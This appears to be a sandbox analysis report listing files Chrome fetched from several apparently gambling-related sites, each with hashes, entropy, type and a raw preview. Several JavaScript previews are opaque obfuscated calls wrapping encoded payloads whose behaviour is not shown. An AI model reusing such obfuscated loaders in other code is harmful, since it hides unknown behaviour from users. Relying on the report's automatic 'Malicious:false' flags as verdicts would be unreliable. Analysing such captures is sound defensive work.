                                                                                                                                                          Preview:GIF89a..F....8IH.................{........kz....Sq.w..erq'5:......s.......................',.......................kf.......................$%...................j.................OXc......................emw......j........c..2;F............r..s.|......Z........`..x..........CUQ@JU.VQ.-4.........Wil.......@A...............v..........o....&..............ms...................1A;......^gr...Zbm...KT_....~l..?a....R_Z...o.........5W._hb.......R`\.............................m..................G]^......l..............\b......^gbs..............Fj.......FOZ........................U^hf................ov...............V|....u.........../O..........H^_Gj..............................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):824
                                                                                                                                                          Entropy (8bit):5.700480017096934
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWRtrBh3Eymv3YXdJb5T2kgavb0geqENvHSLfLznrpVmPCtow4gSUmlUKu0:VgBlMIX392kzvbbbENSDT9gPCtotXUob
                                                                                                                                                          MD5:5959245C29A3AAC5C6BBCE166075429B
                                                                                                                                                          SHA1:35F4431F14751CDB310CFC1003219E58FBE2AF72
                                                                                                                                                          SHA-256:B00A1BC862D578384B76370600AE72CD19941E9CD0067AFDCB0B420E43FD0DA5
                                                                                                                                                          SHA-512:A6E23AE2A39C48F8BBDC49D39264119FE07E53F79A84F33E0EEE5A2975A076180CB019F3FEFA9F614384E7CE2B614DA45DCA8838A0B09FD626C44DD047638284
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/footerCopyRight.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgNgA4BdAGgG8AiAVgEsUA1KgLgDMBXNGAFwbUw8yaMiACU1DkhAACJDwBOdXlQDcAeTAArELwB0AExBs6aEAAUFKCCAU8AnphFUA+i5BIAsigMcANiBUlABuUH4cICwAhAAMAL5iqqEKMnQAvCCYVDEwEGxUYmQoaRQGUDxQ7Fy8/JgSCiA8HApoFDDW9gBKdADmABY8LFRBMAZo5uV9LHSGxlD+PHoAwujyUGiLo2gAEijyZACqAMoAonwAtpHDcXFklzx9PkgsFLcwDeUgBlXcfOh1FGSMh4aQedCQwjSwFMBhQwD0RwA0gBJAByqkyVFwAEEtD0Clk9AB6KgAajQpKoRJhIAAHnotEgCnoHiABJxfrU0BIgSA0mg9O0IF1egNVIsACRmWk8AAqyjgmA5NX+Ek2HW6/RBAqFIq1ZBmRjY8z8iwOfD8eh6jRWws1A0wIDIyr+Am5FAaTRawMFGtF2oSgbEt3OKC4PC+PxVAgkNzIMBKDTQRgUUddAKBILBELQoL0EveIE+JwClw2ojzLmkfjYehcMAAPg20KpPc00DJMQY6MEghQ1nwYEs/FAkM8qGwUCgIwoALS6pRaqi3RYuPyCX12/3O6rp91t72YpDQNBBbCr4IbqtOMRiEjB2+3AfKTpslMAMTQz2wJDiSSgKRQBkWSMAcRJEASKDxmQUS4DunL/DwEiYgAIihBjYgUtxUGUFSzsEs64DEAAsUBQAA7CAEHCP4fiJAKRomiCUB6HSEAoHYSC3GhGFprUQjujciRAA===")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13380
                                                                                                                                                          Entropy (8bit):7.947193700012093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:OMiNuMZ9aSfgV7ED4zQMjlg3k0ZNNf1iEtlUwizoJDj0wUSgBjDF1/W8Z7Wspv4S:OcO9aSo7E05z0ZNNfQE1BtsjGvspAS
                                                                                                                                                          MD5:5357E4239740BA9EC45D841B12D855FE
                                                                                                                                                          SHA1:7AD3F29D694D88A132DD04A972525E751D286279
                                                                                                                                                          SHA-256:62CDE00BFB7F2FC78CDDCEF1F756F1BF6B41938135FFFC2A983C4EF195A5290A
                                                                                                                                                          SHA-512:21963FFDC270538053958756B2CB00F56B325DF2AE36C23B913CCF4F1E81F8CF9A71E0EE102640DB0227611BE98F48645891B3F6222B28BCB7B9D040718B097B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/bbin_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BC4F1C158D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BC4F1C148D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1128
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):729
                                                                                                                                                          Entropy (8bit):7.7132707823149715
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XKuJmaEICbh+f5Gvy4/4euRvHMTT9E647je2CwulXxSpWdRs1ehQUUXxdEIKKzpN:XKuJHYh+kJKvHSTC7i2CBBOCaghBUjtL
                                                                                                                                                          MD5:ABEE6E3E7F0073095231A74DBC766104
                                                                                                                                                          SHA1:532259FDE6D708973B32D7C68A61C8EDBBDFFDB2
                                                                                                                                                          SHA-256:FFC717CF207464ABE24D9BF9FFF8EBABDAD22C27C8435EA1C0F3FC18DFA31F3F
                                                                                                                                                          SHA-512:CC12E2799FC4E8CC18E38A0129C2D46081C5C2561844B70DBF23252E57758D21300E3C6D37D7E4705C45773AAC37D717F5B7A0ADBB45EB97A97F4BF15F73D812
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..........d..o.0.....Q.m...(..".k.IE[5....\.M.%v..Ua...4MB.....!...@..Z....4-.X....y........0.....4...A.f...e.-.X.o..2N,CU.sc9..l<YL..[g...p.....q........r...c.xe.@P..I...!..2.X........J{8...z...eCX....eB....KE5xJ......S.,.4.:VM.V..b(.......1...C.}*.Z.V(.....}..J..!i9Ws.N*.......rXFI..b]....v.Yg.T..\...g...8.^u..w..^...ix...`..H.2}.a.{i..v-S.5q.....0.iv..{X..].R... .z-x.+.s.:...L*...V.<u...(C..0.L.^...*..Tk..e6.'pR..6....f..P.....Q#...z..]...?H.XH..~....)vE .I84.Xw.......q5.t...C.i;QZDT.Py.../n.K..]..N..."....r..:.3.$=...$..O.B.v.9...L4{.B..Y.....x.S/&..x.F..D1.r........%zL.Y.........aj.....a...r..NV().N..w....#...p.L-....|.....?.............t~..,@..5h.$.2......w'........`..h...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):46363
                                                                                                                                                          Entropy (8bit):7.992069479137757
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:V7sGwp58JeLt5nEEzveqS6OP74JTJTc0sYUDDQvIuZsvqRx8ZUoYOr:V7siJ6tSunSPsfUDDQvIcqsOr
                                                                                                                                                          MD5:58B037BF9B5D946F526268642F7D084E
                                                                                                                                                          SHA1:8371F01F3C3D40EED3B6E20F5825AF6CFBB75018
                                                                                                                                                          SHA-256:88DDC5126678843CD4210026AA4B48E68837E200CDE8B8EBF362A4081C10B420
                                                                                                                                                          SHA-512:2727F9638526F26DC79DA57AC68F3DE6A2654DD81A2393CEB866910C7F63D065A25B5BEA0AE8CFBF6AEEBE02606BC96997845F2C7D7D03A09E2A0A259B77E7E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:54E04FB893A611EC8275D01F62C539EE" xmpMM:InstanceID="xmp.iid:54E04FB793A611EC8275D01F62C539EE" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B70E39BCDEB11E9AE98C341B6C88BB3" stRef:documentID="xmp.did:4B70E39CCDEB11E9AE98C341B6C88BB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..A.....IDATx..}..]e.....2o.$..LzB......P.Q...TD.u..U.e.k......;...@.).gR..7.....{.$.. ...uy..7..w......+..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16228
                                                                                                                                                          Entropy (8bit):5.053983434030325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:g9UztP6/SOOmz6C5ckwgaCPrXfiAbwJuKejbMFo/z95N0Db23//70Lonier:g9UU/fOmzwCTX+er
                                                                                                                                                          MD5:1AD1EE321134B2A6630D60F75DF1F7A2
                                                                                                                                                          SHA1:5E64551B37AD207037A884091FA66EBE8183AC2E
                                                                                                                                                          SHA-256:E93D060958E7643D5005229C5BBA7AD7B4E40E8C912B06609876729871C4E42E
                                                                                                                                                          SHA-512:9C1178DB50353F24E7B551ED98D016AFE15372C7F841BC0C3F268C67E04592372AA6BC55FED7AEE624F25BEF24446A0205ACAEDC8A0964E81B9EA2AC23D4E869
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/wasm_exec.js
                                                                                                                                                          Preview:// Copyright 2018 The Go Authors. All rights reserved..// Use of this source code is governed by a BSD-style.// license that can be found in the LICENSE file..//.// This file has been modified for use by the TinyGo compiler...(() => {..// Map multiple JavaScript environments to a single common API,..// preferring web standards over Node.js API...//..// Environments considered:..// - Browsers..// - Node.js..// - Electron..// - Parcel...if (typeof global !== "undefined") {...// global already exists..} else if (typeof window !== "undefined") {...window.global = window;..} else if (typeof self !== "undefined") {...self.global = self;..} else {...throw new Error("cannot export Go (neither global, window nor self is defined)");..}...if (!global.require && typeof require !== "undefined") {...global.require = require;..}...if (!global.fs && global.require) {...global.fs = require("fs");..}...const enosys = () => {...const err = new Error("not implemented");...err.code = "ENOSYS";...return err
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 4964 x 72, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):74604
                                                                                                                                                          Entropy (8bit):7.982916247536255
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:Rnrw0YzEnf0NkLuvzHDU7/gZ2GRN1ZEl7Dqxj4L1xD4o3RjMxgAXY1hqp/ubLmf:THFmbDU7ITRlE5WG1xcIjWRlxubLo
                                                                                                                                                          MD5:20750D3161559951729E005CF988BB1F
                                                                                                                                                          SHA1:67AC93184C3259C55EA7E26D6F8716525946223A
                                                                                                                                                          SHA-256:56AF3A9FBC08041521E9F381949BFC2E9548B013798BAC0B2D629AB3939D8913
                                                                                                                                                          SHA-512:9723A636F7E28D32DF6AEE4BAD9D6BE26DEB24B3AC29AA5FDDFD74C6253A589BEDE1295B384C5321CCD96D3F9549507DD76E78E9B7790C17587548BED3E85935
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://x551005.com/ftl/commonPage/images/partner/partner-hongtu-white.png
                                                                                                                                                          Preview:.PNG........IHDR...d...H......F......PLTEGpL......+......................................................................................=.s..............................L:4.........d8..../*....#)........4...T(u\>.8L........[G.+...b+.a/....*&..%.&+.5..%_..B.%'..'.$%.vH.k).U......%@..;"..~=..`.v$.e.)&.....-.X.$.<..#uqi.'E..h...z..|ZZQ..U2..).z.?..'&fVH..i.......%\..tM%.Q.."#..n0..*...6.M...:=...+.......;.....Y[..>0....;.....^.P.!.....F.P.G........Z.......GxV.N..g..Y..b+...HCU...'..O.@... .u.z..}.....~.;.h. .<.4.................)...._#../.! ....."..UR...&'..d.f....C6"....!....!..2....|-............&1.G..]..#..x.n...&.Y=..... .....F....@..D(('......^ .{..V.|-...........Q..D..m,dY.c.-H;E.2..o.....Ef,..c.....".cb..&.................&+......h...M....^.....U..2...y....3F....tRNS.....:.C....+.#.e..2\....OV.kz.q...........7...#u>.~J..T\....d.u.....C.... ...Y.....wK.._...............G.......................jy..d?.n.... .....E7&........(Y...........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65371)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):117593
                                                                                                                                                          Entropy (8bit):5.105245542809429
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:CDSGxw/0yBXSzL50e5I5B/H0qReXsRtNtFbdbJFG3++TaK5LufoZWlkRQmNa+:uw/fydI5B/H0qNRPHFBtfrlQ
                                                                                                                                                          MD5:D80E3F9086D118A356B83BD303C2853B
                                                                                                                                                          SHA1:FBFA74769080698A34D7B51B0EB2A2CA5D056F00
                                                                                                                                                          SHA-256:C9576CAF98F49D4C4E9C8FCEFA9D2EF94B7771AF89E0382DCE2F37561893D98B
                                                                                                                                                          SHA-512:3F7343B708502ACF88419774EC2BF4870DC5B897294D5F969F708D3C80C76CA800A1765612E388D5B7C312935407BF1545E3E90A3B0D4832777DC7558BDD09DA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/default/bootstrap/bootstrap.css
                                                                                                                                                          Preview:/*!. * Bootstrap v3.3.4 (http://getbootstrap.com). * Copyright 2011-2015 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.2 | MIT License | git.io/normalize */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-webk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1070 x 115, 4-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2435
                                                                                                                                                          Entropy (8bit):7.850978467294237
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:lNeQSR6M9g32kvMlq+E0iG5fksAIWqjYvb:lNzMK3pp+Dim0I2b
                                                                                                                                                          MD5:6F91EAAFA8F4BBEB9BF36FCB434D46C2
                                                                                                                                                          SHA1:1A86DF7329738506E1767369481FBE4371F0AD25
                                                                                                                                                          SHA-256:A08174E369A472431AE048079DA69030011EB02BE72BB35C3A36A4CF93DE28AC
                                                                                                                                                          SHA-512:7C32E0682B71E6322CF6334D092500F28A44841DA31A9722026173A7CC048D617CE6DBE30BFFB91BFFCDA1D540CFCB1D6861985FFF71514F0E1B3F5828B63550
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......s......^^.....PLTE..........................)IDATx..XMs.H.E$.s...]>.".......9..........[a.&U.&.DA....;.....y|.L..........taa..0]X..,L..........taaa..x]..F.E.~..AFnT.qG~.......".q...,J.o....... .P$..@Y..c../;....(#..@.9..8......T.B?G1>#!P..B.<B..."...."6......H.......0.x7.....!tD..4Uz.B..)....9....).D.P.9J...%..pn....y._Y{...~pn.B.....H..."*..2..s...B...+u.......#ZZ.^...-.....BK...3......_t./..r...6zv.?....D....(*..>_.R.....a}..>.^.g...P..x...K.b..7W.Y...b.. ..6..en...EI).ic....n....zZT*...QY.....->.2..../JlH..F..cY...c..>.e.....}...h.$t.m.......O`].W.]..ZS..*.W....?..{nB.......3..!~..+....*C.%.......m.........'..kB.............BKV.D{........`.SJ.s..d...*U.Y9.'.g.?U.......s&N{..../..={........c..*.l,~..w./...m...{."0]|......",]..y.(.2.........P$.Qq..1.F..H..Q.K.".*..{V.~.rZ.H.s.1.i..Y.B..,|'. .`...v-6O"....}$....{../.GaW.d.../....,_....i8>a.u.....e!9."..$..(.I.P......y.w^./T..6..}....]$.\.{(f..L.T...y..").i.p.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1740), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1740
                                                                                                                                                          Entropy (8bit):5.863746419169325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VE9RvUBzEM5vmLi6gtlM/E307UJsswEwNX85oVbR:VE9RQBmu6gtC77UQNX5bR
                                                                                                                                                          MD5:D41604EED8C01D725D5082FD2039463B
                                                                                                                                                          SHA1:D9843674196CFD4C67E247927C78CD58BFB38094
                                                                                                                                                          SHA-256:5B8264FD10F490EFF4AC621CE175CFD0CE511CFB34A556BCF760B0759499AA8D
                                                                                                                                                          SHA-512:4BC476EAA3CE2FDB70054AD701062AD3E61B10F15780557DC383047313A0777D16791E002150EFAA875300B4B640236020E6D69F04420A79959919AC68CA1A2B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/bonus.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAmAXQBoBvAVQCUBNALwC4AzAVzRgBcBLdTN3K8AlJQC+5AE4BzAJwBPNpx780g4eRRiAROyQgABEm5TePHQG4A8mABWIHgDoAJiFa80IAApSUEECluBUxech0AfQiQJABZFBd2ABsQHSoANygk9hBmAEIABnERS0ypQzQAXhRMHQARFwAOYB0RchBqp3U0NqRq2oKYCFZW6X6dADl6AA9rUfZKzBBMEUwJclsHHkwpJwBbKAgAcRBubkCkVewdXiQAGRQZTzSdMHR9XxQ929TSNsoZKcJihgAAVXh7XIcLh8ARiKSndhSNCGbgAC1uTm4KAAQnZwZDBBikE4YCh2BB0ABJNCsFBOExQIIEkAiADUOkMAD9DIAG50AFOo6cTFKguKDcKDKGFqFaUBHcJFoShkinU2koZjrW4ACU83AAymiQflcMIkHVTlBeElDca8rhheRgOKYGjNbcHk80FLVAJuGJuAB+dGYwHcADC5MpaBpdJWzCJmJ1ettwEq9vIIZJtwtEutqfTuBEkjeaA+fm+Bh9sPU/soZUMvEqWcs3AAZG3uFi0SB1NDfbWA05An4pIGSW5WFBkl3qHwkk4soFuAB1JloTwyQTDqSj/YxJBQQEiZi4SrNpwIpAzpy3HGeFyR9jedD6058NAyDtdq837ESpInxfNAAEE9nJNAg1CW8kF1SCC0KYRSSjNU6QvX8kn9BNeBguCDSNNMMxwnNLXzAjCyQlVo1jFB0JiGdi2LSQyT2CB2HOFxmGWVZ1k2RxuB2fZDhOM4LiuG57keZ5wlLcsvh+HQ/ioMNgTBCEoRUGtZXlRVUWJLFcXxdTExJKjUPpRlmXU9lOR5AUhRFSF0QSJBNTDJ9qPVasZTEEyYM9TwAB9AqzGDvBXERv30gASEwUARZC9m+ASdH1ABRUEIhxawJmofVvFoaxYipdK0gndxp0wpwQIgXg3y
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 356 x 300, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46260
                                                                                                                                                          Entropy (8bit):7.977860249642797
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:KkgEy9JJ7vCSbIniRT0+kO7L3B9TfN5c//azcoI+bwazpLiHz46/sCI1VE5j5BdD:lk7KSMB87N9LTZzcoI+bpzZV6/a0Hdkq
                                                                                                                                                          MD5:8685409ADCC834043FFC23EC5F822FBB
                                                                                                                                                          SHA1:65D760B0C124DF9CC7E5126C9171050B5232A7BD
                                                                                                                                                          SHA-256:3449CC5B77C302F3363EEE68A9EF323ABA93D178A9352F2DCCCE2ECE205867FA
                                                                                                                                                          SHA-512:A0568941289E84278055E668E453B2D95F324F5FDFFEBC8CB5D0FB98F3E16B6BDCEFD452B0FDA1B7AFB64AE174516B67504CE5D59970495955488DA8AC43C500
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/service/img_logo.png
                                                                                                                                                          Preview:.PNG........IHDR...d...,........!....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:A7E48487F77711E7B9F9B3F72C3590DB" xmpMM:DocumentID="xmp.did:A7E48488F77711E7B9F9B3F72C3590DB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A7E48485F77711E7B9F9B3F72C3590DB" stRef:documentID="xmp.did:A7E48486F77711E7B9F9B3F72C3590DB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......$IDATx..]......]...r>.7l.i6.@..O.=@....=.P..j. ........w......q...;_?I'iw..v.....lK...;.=......|..7..8.P.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):860
                                                                                                                                                          Entropy (8bit):5.747083721513129
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:V4kEYO4npi1dO3LlhWOaCF80RGkSlOnjrn:V4RqpOdOblhWOaCFTRFSwnP
                                                                                                                                                          MD5:570835640BA3A9C10739A6AEDF945AD6
                                                                                                                                                          SHA1:AAB7F6B2A9D7BEBE1C11D1A469D074B5DF961C85
                                                                                                                                                          SHA-256:F7E4EB4058A5352F546C3D5DD39B66344AAAB9D725382DBCE4BED9A91CA57BB3
                                                                                                                                                          SHA-512:4B487DDD258D49596DF3A33E1EEA90A61ABCD1857E1257242AE4458520A5BE569FBAA8A7A5F5CB87C54B849D445660D65422DFBE99FBED2C48BAC0D637CB3699
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/imageLoader.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZnwBYBdAGgG8ANAaQEcBLALgDMBXNGAFwfUy7IgAlBQC+ZAOZsQAEVYduvNP0FkGIgERskIAARIuAJwbcNAbgDyYAFYhuAOgAmIFgzQgACoZQQQhrgCemCBkGgD6YSBIALIojmwANiAalABuUAnSTACEAAyiQmbphrpoALwMmBq5MBAsGkJkhmWYAMpGbhKUEN4QSEwUSIYwTO3GaBLijlBcUPKcPHwihiBcbIZoFAwAtlASIABCUDoAbERMaIkJouLAMzAAFgNDI1vb2yCODDMgOblkDygaEcSUM80UfC4Ii4DwYSHsCRQUEcAEldvtMEIbuIPjC4v0KIjkWi9r92AslJiKMVdFwyjC4WY0E4XFBElx7ABVHgJexwg4JIFwfiw+EvIQAHwlmGZzhYbISHO5DF5cJJ+xkdjin0xAH5Zaz2VyefZ9lxNTBtaj0YdjiAziK4fZxfYYSBlOSIcphBQVmsNrS+TajqciGUQAUmAz4TtSSH7WHo87hliyOgADJIxzgxbKaGi+wAEhA2wYXCqRMcDXE6AAooZvGDPbmqUni6Xyxo/I3q+IYCsftnm5SRDdGlAyr73c4mwoWyIaXS2/2QD9a0kPmguGY/etlEmwjoEix7GEYFKoVUdhIUhQZkYCS8owXY/t42ca2gBpXn06M1nBAbFAwSTOsgMMMdxAMGYTAAJWnPwADE0H6bASFEIooBKJAKiqAA1TkAHoAA4GkwQwyCgMhslwMhh0hERKg0WhGGrUJplmABaVJOIAVl43AiBYE5HFIshLgSBJChAFl5XZMp4RAAAPCBgK4JAxzMIA==")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 50 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4592
                                                                                                                                                          Entropy (8bit):7.858171152982243
                                                                                                                                                          Encrypted:false
